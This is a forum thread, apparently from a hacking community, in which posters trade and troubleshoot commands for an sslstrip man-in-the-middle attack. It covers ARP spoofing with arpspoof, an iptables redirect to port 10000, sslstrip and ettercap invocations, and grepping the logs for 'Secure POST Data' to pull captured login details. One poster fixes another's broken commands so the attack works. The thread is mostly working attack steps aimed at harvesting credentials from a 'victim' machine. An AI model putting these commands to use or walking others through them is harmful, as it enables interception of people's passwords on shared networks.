Also another way of doing it (which I think is BEST)
sslstrip -a -k -f -l 8080
Ctrl+v (past) "Secure POST Data"
and you will see the following (Ex: login.yahoo.com) login details within the next line.
F3 will guide you through all of your logins by order of entry.
Hope this helps anyone who is having trouble filtering out all the bs in the logs...
great tutorial,, althou im wondering, what command in here, is it that gives no warning?
and how do you know what to grep for? and when to do it?
also with this i noticed you did not sign into yahoo mail, is it becouse account did not exist? im guessing that anyway :P
i kinda lol'd when i saw "w00t no warning" then "wrong account info" in other window ^^
I successfully ran sslstrip within my own network against my second laptop, and it worked perfectly. However, subsequent attempts against that laptop are not working. For one thing, when I check the MAC address on the victim machine (arp -a) I am not getting the same results as I did on the first attempt. Also, the log file I am keeping on the attacker machine is empty. Most importantly, when I went to gmail (on subsequent attempts) I got https instead of http.
Here are the commands I used on the first (and subsequent attempts):
echo 1 > /proc/sys/net/ipv4/ip-forward
arpspoof -1 wlan0 -t 192.168.5 192.168.2.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
python sslstrip.py -w logfile
Running backtrack 4
I am wondering whether there are any specific commands I should have run after the first attempt to terminate/kill some of these processes, keeping in mind that after the first successful attempt I completely shut down the attacker machine and put the victim machine into sleep mode before attempting subsequent attempts (and I rebooted the wireless router).
Any ideas welcome
Ok so first of all, check that you have no firewall on.
Second I would suggest you do this using ettercap too like this:
Your command looks like this:
[CODE]echo 1 > /proc/sys/net/ipv4/ip-forward[/CODE
When it should look like this:
echo 1 > /proc/sys/net/ipv4/ip_forward
If you also want ettercap here, you edit /etc/etter.conf and then typeCode:
arpspoof -i wlan0 -t target gateway (not arpspoof -1)
sslstrip -a -f -k
ettercap -T -q -i wlan0